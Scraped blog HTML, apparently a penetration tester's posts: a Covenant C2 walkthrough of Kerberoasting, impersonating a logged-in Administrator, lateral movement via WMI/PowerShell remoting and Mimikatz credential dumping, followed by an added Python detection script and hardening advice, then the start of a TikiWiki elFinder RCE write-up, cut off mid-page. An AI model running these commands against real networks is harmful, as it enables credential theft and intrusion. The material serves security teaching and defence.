href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcTr7QXO5ur4UIlh4eP_9VW2YtuE6mNtNNrgiFBpIaGkQT7IT9icRir7oRDG7zdlCazCCBEEAUa8noHYGS-lj4hCSFq09-M3m7xe0vrNMEMFVcoHh757j7lDYBaJ1l_hWrlJn_ChwY6fx-IiFhbO5d0FrXoy2KobtGIqd9wW6lyqmQtvfxotS9ZeeY/s549/32.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="354" data-original-width="549" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcTr7QXO5ur4UIlh4eP_9VW2YtuE6mNtNNrgiFBpIaGkQT7IT9icRir7oRDG7zdlCazCCBEEAUa8noHYGS-lj4hCSFq09-M3m7xe0vrNMEMFVcoHh757j7lDYBaJ1l_hWrlJn_ChwY6fx-IiFhbO5d0FrXoy2KobtGIqd9wW6lyqmQtvfxotS9ZeeY/s16000/32.png" /></a></div><p></p><p>Now, in the <b><span style="color: white;">Interact</span></b> tab, execute the command below to perform Kerberoasting against every SPN registered in the domain:</p><textarea style="height: 28px; margin: 0px; width: 250px;">PowerShell Invoke-Kerberoast</textarea><p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjxIaWd2F6vqVGs8fd4nxZjW0N2rMiIUx31YUmDpqEueG_3rO8Wff-qrcsY8hhqEz4pf_ndSnduiOOvKymQrd7MG4iMjLDG4oD6uegurG5CglGcFLDoBx-SNi1j2KWHqHhno4_7aFAe-hdNCM2_rr8nfanpjdnMKuV_WLgrUCcWa0cn59TSqQ5RDYG/s594/33.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="199" data-original-width="594" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjxIaWd2F6vqVGs8fd4nxZjW0N2rMiIUx31YUmDpqEueG_3rO8Wff-qrcsY8hhqEz4pf_ndSnduiOOvKymQrd7MG4iMjLDG4oD6uegurG5CglGcFLDoBx-SNi1j2KWHqHhno4_7aFAe-hdNCM2_rr8nfanpjdnMKuV_WLgrUCcWa0cn59TSqQ5RDYG/s16000/33.png" /></a></div><p></p><p>After successful attempt, we will get the output something like this:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhcL7C1C_tTBcruXm04gW5VbUb6xHb0zzmSXGovtIipZEuqmp8dWNb1r0WTlEJ6k3fENQ3o6uTQfgxZV2bsbpScN1u1g30Zmh7GCivD5jDOKYbZKOJMrlLEQK-pXsdNCce4vcSMZAqM65ikbRIga85DNZxZHzthkBpCQdoyihWo7b3SI2_yV_YYQW/s691/34.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="436" data-original-width="691" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhcL7C1C_tTBcruXm04gW5VbUb6xHb0zzmSXGovtIipZEuqmp8dWNb1r0WTlEJ6k3fENQ3o6uTQfgxZV2bsbpScN1u1g30Zmh7GCivD5jDOKYbZKOJMrlLEQK-pXsdNCce4vcSMZAqM65ikbRIga85DNZxZHzthkBpCQdoyihWo7b3SI2_yV_YYQW/s16000/34.png" /></a></div><p></p><p>Now, try to crack it using hashcat or any other tool of your choice.</p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">2. Impersonating logged-in user</span></span></span></h3><p></p><p>This technique is all about impersonating a Domain user which is logged-in to the machine in which we have local admin privilege. 
We can impersonate any user logged in to the machine.</p><p>To make the most of an impersonated user session, it is always recommended to launch a new Grunt once the user account has been impersonated.</p><p>To impersonate a user session, first of all we need to find the list of logged-in users, which can be done using the <span style="color: white;">Task </span><b><span style="color: white;">GetNetLoggedOnUser</span></b>. Specify the hostname of the machine on which we have the Grunt session:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4Sr4YPsVixv_TGyEyJ1hugKXpwPuJj0WVfxsILvRYHeRwwqSxLtwowX4rX7Upz5nPaAJS8R_Iy3dq2lWuyAE4zvBgOIMuFFAtGjDMLrvQ_Pkl7WwJGXhHAlNI8eP_WuS-21YEOC932QEWCi4EvVNVYgDAHEk48C8oQjwxIgyaINugbaCNmgNo5YA/s491/35.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="440" data-original-width="491" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4Sr4YPsVixv_TGyEyJ1hugKXpwPuJj0WVfxsILvRYHeRwwqSxLtwowX4rX7Upz5nPaAJS8R_Iy3dq2lWuyAE4zvBgOIMuFFAtGjDMLrvQ_Pkl7WwJGXhHAlNI8eP_WuS-21YEOC932QEWCi4EvVNVYgDAHEk48C8oQjwxIgyaINugbaCNmgNo5YA/s16000/35.png" /></a></div><br />A domain user named 'Administrator' is logged in to the current machine: <br /><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinyrlS_OWbGQPb6PshZpT3HEDFlFaAw7WIza5n_3g3nDFojyILDPGS2Rdp14v5Msq6o9A4qY4YBLuQMUUyYLFFaxV8PAM0RW2fXaIbazDy5vrf4sYCx705uR9vnKbdBbl47ZaSWCkuUadV94OdsG88naYQmT-kAb8do9vDaeCLQoTVHYCPotA-95xc/s636/36.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="431" data-original-width="636" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinyrlS_OWbGQPb6PshZpT3HEDFlFaAw7WIza5n_3g3nDFojyILDPGS2Rdp14v5Msq6o9A4qY4YBLuQMUUyYLFFaxV8PAM0RW2fXaIbazDy5vrf4sYCx705uR9vnKbdBbl47ZaSWCkuUadV94OdsG88naYQmT-kAb8do9vDaeCLQoTVHYCPotA-95xc/s16000/36.png" /></a></div><br />To impersonate this user, use below mentioned command:<p></p><p><textarea style="height: 28px; margin: 0px; width: 400px;">ImpersonateUser /username:"Domain_name\user_name"</textarea></p><p>which will be like this in my case</p><p><textarea style="height: 28px; margin: 0px; width: 400px;">ImpersonateUser /username:"DC01\Administrator"</textarea></p><p>By executing the <b><span style="color: white;">WhoAmI</span></b> command, we can see that we have impersonated user Administrator successfully:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX-KKvaDGRbGkMRtIpsjWdExNdjpYeCaVpFppP8vB8_IyyicIupRPxhT6zMfbsohQoX2D8BBwdQXtRVxe2uXvOs2sUO9OxORmNcuxOquufPzcerD4VG1Osjy0TAVOMO-SnMxbdlRGhlUnbgdM51c9ts_lE1J9abDUDrNO_jKodCMJzc5ySnhcwe_7a/s555/37.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="299" data-original-width="555" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX-KKvaDGRbGkMRtIpsjWdExNdjpYeCaVpFppP8vB8_IyyicIupRPxhT6zMfbsohQoX2D8BBwdQXtRVxe2uXvOs2sUO9OxORmNcuxOquufPzcerD4VG1Osjy0TAVOMO-SnMxbdlRGhlUnbgdM51c9ts_lE1J9abDUDrNO_jKodCMJzc5ySnhcwe_7a/s16000/37.png" /></a></div><p>Now, to get a Grunt session as <span style="color: white;">Administrator</span> user, execute below mentioned command using impersonated user session:</p><p><textarea style="height: 28px; margin: 0px; width: 250px;">WMIGrunt localhost powershell</textarea></p><p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia-zCq7tTN7g0iYGcbUnRdg1WlMfuieo71OG2U3tU617cXW7g15tM4tOQaVTimHPATY3oleCr5vvR5zBXxNbydeVaNS23ZYRlPZz11qldsyrcbry7HSl7xdS1jR5OZ_Lm4mqUU-m5BDC8T1MzF0eOw1eRb0cr7f8Xo3Gw0jsiq0JzkHwVZkYF8U7vF/s709/40.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="294" data-original-width="709" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia-zCq7tTN7g0iYGcbUnRdg1WlMfuieo71OG2U3tU617cXW7g15tM4tOQaVTimHPATY3oleCr5vvR5zBXxNbydeVaNS23ZYRlPZz11qldsyrcbry7HSl7xdS1jR5OZ_Lm4mqUU-m5BDC8T1MzF0eOw1eRb0cr7f8Xo3Gw0jsiq0JzkHwVZkYF8U7vF/s16000/40.png" /></a></div><br /><p></p><p>And we will have a new session with the privilege of impersonated user:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3U5JDs8rrabhpsFFgd4E5ukSPwo_wyJBHl1-hKKoscyNUUilkXjNoGDCXc4pZguOxDAkFD0tNvzmbY_AccIdLbLCwRgSF8Cub98QQ1Pce9aJ_NswW65_-TBLBtEb1EvpfTv0mDsd-jOh5btM_hN4aAEWuB4L8c6Xs-bNHrvAB1Xzwx4yuGGojvIjs/s1485/39.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="456" data-original-width="1485" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3U5JDs8rrabhpsFFgd4E5ukSPwo_wyJBHl1-hKKoscyNUUilkXjNoGDCXc4pZguOxDAkFD0tNvzmbY_AccIdLbLCwRgSF8Cub98QQ1Pce9aJ_NswW65_-TBLBtEb1EvpfTv0mDsd-jOh5btM_hN4aAEWuB4L8c6Xs-bNHrvAB1Xzwx4yuGGojvIjs/s16000/39.png" /></a></div><p>Using newly created session, we can execute command to move laterally (if this user has access to other machine).</p><p>For example, this user has local admin privilege on another machine, command execution is possible. 
To list the user accounts on the remote machine, execute the <span style="color: white;">"net user"</span> command using the <b><span style="color: white;">PowerShellRemotingCommand</span></b> Task:</p><textarea style="height: 28px; margin: 0px; width: 530px;">PowerShellRemotingCommand REMOTE_MACHINE_HOSTNAME /command:"OS_COMMAND"</textarea><p>in my case it was:</p><textarea style="height: 28px; margin: 0px; width: 450px;">PowerShellRemotingCommand WIN-A08PEI13CFI /command:"net user"</textarea><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMKoaEWhwwuwJk1-5Hg3_h-NnuToK7AeeJV313VhMBR1EEf7t2pNduI3-PA55suNyggOiTIofYuaJQeuEBdnnHWdnFWwIa2ui-X8M1ALHDXwt7pD9jnv6MKtkI2rC4yvNiX9AbXJ5BrJ5cbUjUeFICkyg9TViZACiOkDIqWXHbeCDEMKUrAuAHkOrv/s1221/41.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="623" data-original-width="1221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMKoaEWhwwuwJk1-5Hg3_h-NnuToK7AeeJV313VhMBR1EEf7t2pNduI3-PA55suNyggOiTIofYuaJQeuEBdnnHWdnFWwIa2ui-X8M1ALHDXwt7pD9jnv6MKtkI2rC4yvNiX9AbXJ5BrJ5cbUjUeFICkyg9TViZACiOkDIqWXHbeCDEMKUrAuAHkOrv/s16000/41.png" /></a></div><br />Or using the <b><span style="color: white;">WMICommand</span></b> Task:<p></p><textarea style="height: 28px; margin: 0px; width: 600px;">WMICommand /computername:"REMOTE_MACHINE_HOSTNAME" /command:"OS_Command"</textarea><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWde0cVvmGBr5Nn1-681p4sIOQ5QVxl5kL2s9zGLp_wSpeuJl7cgoOpSFltwI2lLpxD7vh-SkuJddxH6S4EIMn3RUloz1_RqKDbIjX_Vp3dNmb9ZghKUfgopvPeXgRvma8l-Fg4fid9Ih3TAjd1ehThW_9HJ-kfiFl05HchHrigwlJG3WHAWRZXz2J/s991/42.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="394" data-original-width="991" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWde0cVvmGBr5Nn1-681p4sIOQ5QVxl5kL2s9zGLp_wSpeuJl7cgoOpSFltwI2lLpxD7vh-SkuJddxH6S4EIMn3RUloz1_RqKDbIjX_Vp3dNmb9ZghKUfgopvPeXgRvma8l-Fg4fid9Ih3TAjd1ehThW_9HJ-kfiFl05HchHrigwlJG3WHAWRZXz2J/s16000/42.png" /></a></div>We can even get reverse shell or Grunt session from this remote machine (will demonstrate in next blog post)<br /><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">3. Dumping NTLM/Plaintext password of logged-in/local user account</span></span></span></h3><p></p><p> This is simple one, we just need to use <b><span style="color: white;">Mimikatz</span></b> Task:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVM0QLo26-SBt881ncFbkZRxOzmC7CjK0nhPGlrDCp8HxYbNjGRFn9EH6rv4rc8l6NTuOpgRxk2QJB0dbGYpvMj1DdthXEbvjXuPRRzlxBAixwva1P74UW3fCuRXQoUyM0FSCbSMs_D59GWdIl3GF1AUIxmyH7mPHePC8Z6LNHTyjuCDtJYWCfjq8w/s560/43.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="406" data-original-width="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVM0QLo26-SBt881ncFbkZRxOzmC7CjK0nhPGlrDCp8HxYbNjGRFn9EH6rv4rc8l6NTuOpgRxk2QJB0dbGYpvMj1DdthXEbvjXuPRRzlxBAixwva1P74UW3fCuRXQoUyM0FSCbSMs_D59GWdIl3GF1AUIxmyH7mPHePC8Z6LNHTyjuCDtJYWCfjq8w/s16000/43.png" /></a></div><p></p><p>And there we go ......</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicMlJssg8SAI_ho7W-ne3Bq_onFiDbPm0VlyPD7gmMkLF21OWtf20QBQLVXvXNYdunwaFgZgT1kTUmG33EvJYsbTMfwh1evMjFRAh7bSZGkFbU72Fc8wStvY_z5oGWa2wcG2UzNd09WmTF2GozzdICCyOwKBKR8iJBRCNrhy1hHLqcHcQ6GVitvOUz/s787/44.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="787" data-original-width="749" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicMlJssg8SAI_ho7W-ne3Bq_onFiDbPm0VlyPD7gmMkLF21OWtf20QBQLVXvXNYdunwaFgZgT1kTUmG33EvJYsbTMfwh1evMjFRAh7bSZGkFbU72Fc8wStvY_z5oGWa2wcG2UzNd09WmTF2GozzdICCyOwKBKR8iJBRCNrhy1hHLqcHcQ6GVitvOUz/s16000/44.png" /></a></div></div><div><br /><p></p><p></p><p></p></div><div><p>Thanks for reading.</p><p><br />Special thanks to: - Burcu YARAR, <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, vivek chauhan, Manoj and <a href="https://twitter.com/5h4d0w_hun73r">Karan</a><br />
</p><div class="separator" style="clear: both; text-align: left;">
<br /></div><span style="background-color: black; color: #bbbbbb; font-family: "segoe ui","arial"; font-size: 16px;"> </span><br />
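<p>Each of the three AD Tasks walked through above leaves a footprint in the target's own telemetry, and the sketch below shows the detection logic a blue team would run over it. This is an added example, not code from the post or from Covenant: Event 4769 covers the Kerberoasting section (the same TGS requests are produced by the Invoke-Kerberoast run in the TikiWiki write-up further down this page), Event 4688 covers the WMICommand / PowerShellRemotingCommand lateral movement of section 2, and Sysmon Event 10 covers the Mimikatz read of LSASS in section 3. The events, account and host names, file paths (including grunt.exe), the allowlist and the thresholds are all constructed sample data.</p>

```python
"""Added detection sketch (not from the post or Covenant): Windows Security /
Sysmon events that the three AD Tasks above generate on the target side.
All events, names, paths, allowlists and thresholds below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

RC4_HMAC = "0x17"                      # TicketEncryptionType for RC4 in Event 4769
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "wsmprovhost.exe"}  # WMI and WinRM hosts
PROCESS_VM_READ = 0x0010               # access bit needed to read LSASS memory
LSASS_ACCESS_ALLOWLIST = {"csrss.exe", "wininit.exe", "msmpeng.exe"}  # constructed

# Constructed sample events, flattened to the EventData field names of each event.
SAMPLE_EVENTS = [
    # 4769 (TGS request): a machine account pulling its own AES ticket is normal.
    {"EventID": 4769, "Time": "2024-03-18T09:00:01", "TargetUserName": "WS01$@CORP.LOCAL",
     "ServiceName": "WS01$", "TicketEncryptionType": "0x12"},
    # One user requesting RC4 tickets for several service accounts within seconds.
    {"EventID": 4769, "Time": "2024-03-18T09:00:10", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": RC4_HMAC},
    {"EventID": 4769, "Time": "2024-03-18T09:00:11", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": RC4_HMAC},
    {"EventID": 4769, "Time": "2024-03-18T09:00:12", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": RC4_HMAC},
    # 4688 (process creation): a shell whose parent is the WMI provider host or the
    # WinRM host is what WMICommand / PowerShellRemotingCommand look like on the target.
    {"EventID": 4688, "Time": "2024-03-18T09:05:00", "SubjectUserName": "Administrator",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4688, "Time": "2024-03-18T09:05:30", "SubjectUserName": "jdoe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\notepad.exe"},
    # Sysmon 10 (process access): credential dumping needs PROCESS_VM_READ on lsass.exe.
    {"EventID": 10, "Time": "2024-03-18T09:10:00", "SourceImage": r"C:\Users\Public\grunt.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Time": "2024-03-18T09:10:05", "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
]


def _basename(path):
    """Case-folded file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def detect_kerberoasting(events, window=timedelta(seconds=60), min_services=3):
    """Accounts that requested RC4 TGS tickets for at least min_services distinct
    non-machine service accounts inside one window. Returns {user: sorted services}."""
    per_user = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":   # machine accounts, TGT renewals
            continue
        per_user[e["TargetUserName"]].append((datetime.fromisoformat(e["Time"]), svc))
    hits = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                hits[user] = sorted(services)
                break
    return hits


def detect_remote_exec(events):
    """4688 records where the new process was spawned by the WMI or WinRM host."""
    return [(e["SubjectUserName"], _basename(e["ParentProcessName"]), _basename(e["NewProcessName"]))
            for e in events
            if e["EventID"] == 4688 and _basename(e["ParentProcessName"]) in REMOTE_EXEC_PARENTS]


def detect_lsass_access(events):
    """Sysmon 10 records where a non-allowlisted image opened lsass.exe with VM_READ."""
    hits = []
    for e in events:
        if e["EventID"] != 10 or _basename(e["TargetImage"]) != "lsass.exe":
            continue
        if _basename(e["SourceImage"]) in LSASS_ACCESS_ALLOWLIST:
            continue
        if int(e["GrantedAccess"], 16) & PROCESS_VM_READ:
            hits.append((e["SourceImage"], e["GrantedAccess"]))
    return hits


if __name__ == "__main__":
    print("kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))
    print("remote exec:  ", detect_remote_exec(SAMPLE_EVENTS))
    print("lsass access: ", detect_lsass_access(SAMPLE_EVENTS))
```

<p>Two design points worth noting. The RC4 filter in the 4769 rule catches the default behaviour of the Rubeus and Invoke-Kerberoast runs shown above, but a roaster can also ask for AES tickets, which is why the rule additionally keys on one account touching many distinct service SPNs in a short window; the durable fix on the directory side is long random passwords (or gMSAs) for SPN accounts and disabling RC4 for them. The LSASS rule needs Sysmon's ProcessAccess logging, and enabling LSA protection (RunAsPPL) or Credential Guard removes most of what the Mimikatz Task can read in the first place.</p>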
<div><div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, </code></div><div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;"><code class="text plain">#ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, </code></div><div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;"><code class="text plain">#Golden boy INDIA, Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji,Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
</div><div><br /><p></p><p></p><p></p></div>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-23375052082877553242021-03-20T23:01:00.006+05:302023-11-23T10:32:09.742+05:30From TikiWiki to Domain Admin - Journey to pwning a company<p> <br />In this blog post, I am going to discuss the scenario of an assessment. The goal of the assessment was to test the overall network security posture from the perspective of an external attacker. <br /><span></span></p><a name='more'></a>An IP range was provided to perform the external pentest.<br />The Nessus scan result was not useful.<br /><br /><span style="color: white;"><span style="font-size: large;">Reverse Domain lookup</span></span><br />After the Nessus scan, I focused on manual work. <br />The first preference was to enumerate the domain names hosted on the in-scope IPs.<br />Like always, Bing helped to find the domain names mapped to those IPs. <p></p><p style="text-align: center;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDkddQnEIS9IA6tFv5ZcNY6b1t-fp4ZDOY9qxMhoLKbnGANs7qlbKH6E2C3S3kk7tysUPLnaKK-QprTzKoiFIf_tPb5l8eOrrCiUPYIB0-WqWlpzZf6RJi8Nr1RqJoR3ss3Y8C3LKfBn4/s1132/1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="348" data-original-width="1132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDkddQnEIS9IA6tFv5ZcNY6b1t-fp4ZDOY9qxMhoLKbnGANs7qlbKH6E2C3S3kk7tysUPLnaKK-QprTzKoiFIf_tPb5l8eOrrCiUPYIB0-WqWlpzZf6RJi8Nr1RqJoR3ss3Y8C3LKfBn4/s16000/1.png" /></a></div><br /><p><span style="color: white;"><span style="font-size: large;">Discovery of Vulnerable Plugin</span></span><br />The moment Bing showed the URL, something in my memory pointed to the keyword "TikiWiki" CMS.<br />It was because of the URL "wiki/tiki-login_scr.php". 
<br />I searched on Google for a "TikiWiki" remote code execution exploit. I got a bunch of exploits, and one was interesting to me as it was an unauthenticated one. The vulnerability was in the third-party plugin "elFinder" version 2.0. </p><p style="text-align: center;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6MfeLwdWwT0_3XOQyJo7k9jrowYeSJdv0W0zZkrx2mkrk74hjkRpMrlbm-TMw56E3Z9LyxsqkI0Tecc1gz5Utcsyv7d3KGm6_H0wn54dI4lI6OXNzAWY1YS0ZFq9821vuZUNquznlxkM/s1366/2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="198" data-original-width="1366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6MfeLwdWwT0_3XOQyJo7k9jrowYeSJdv0W0zZkrx2mkrk74hjkRpMrlbm-TMw56E3Z9LyxsqkI0Tecc1gz5Utcsyv7d3KGm6_H0wn54dI4lI6OXNzAWY1YS0ZFq9821vuZUNquznlxkM/s16000/2.png" /></a></div><br /><p><span style="color: white;"><span style="font-size: large;">Exploitation attempt</span></span><br />A Metasploit module was available for the vulnerability:<br /><a href="https://www.exploit-db.com/exploits/40091">https://www.exploit-db.com/exploits/40091</a><br /><br />After going through the Metasploit exploit module, I figured out that MSF first checks the version of the plugin by accessing the HTML file "web.com/vendor_extra/elfinder/elfinder.html". 
Once MSF confirms that the plugin version is 2.0, it fires the payload at the PHP file "vendor_extra/elfinder/php/connector.minimal.php".<br /><br />We tried the Metasploit module, but it failed with the error message "Connection reset by peer".</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7qnQeN7aJ8wiLSnVkxXrnrMPn7G410RLNm3xQPfjp2b4J5h7LS7n85KYLrNQGcfRfPxEVGipZ0npJJRe_-dF0vZP1tqcBRPZI-bKcvZrl6ciUIK1MaQvW5aM92y1kR1B1U2ZhaMR7rGU/s1637/3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1040" data-original-width="1637" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7qnQeN7aJ8wiLSnVkxXrnrMPn7G410RLNm3xQPfjp2b4J5h7LS7n85KYLrNQGcfRfPxEVGipZ0npJJRe_-dF0vZP1tqcBRPZI-bKcvZrl6ciUIK1MaQvW5aM92y1kR1B1U2ZhaMR7rGU/s16000/3.png" /></a></div><br /> This error message was actually hinting us to try the manual approach. <br /><p></p><p>Now we tried the manual approach and prepared the HTTP POST request body in Burp Suite.<br />This time, we followed the one below:<br /><a href="https://www.exploit-db.com/exploits/40053">https://www.exploit-db.com/exploits/40053</a><br /><br />We crafted the HTTP POST body with the command execution function "system" and triggered the request.<br />It worked, and we verified that the PHP script was created on the server successfully.</p><p style="text-align: center;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_DsBI3_bzdlcLt7cXSvbLEYxrzBrnY6ERvSaG_rn95yqw0K08rPGglO0d6R2dBFO5RepFyVqfstT_K0o6pItQpAGIUfxXmUZuMc7wGECcxFs1v7QqNZwMMdOauGJIE1ya7dz041X0DvA/s1631/4.1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="698" data-original-width="1631" 
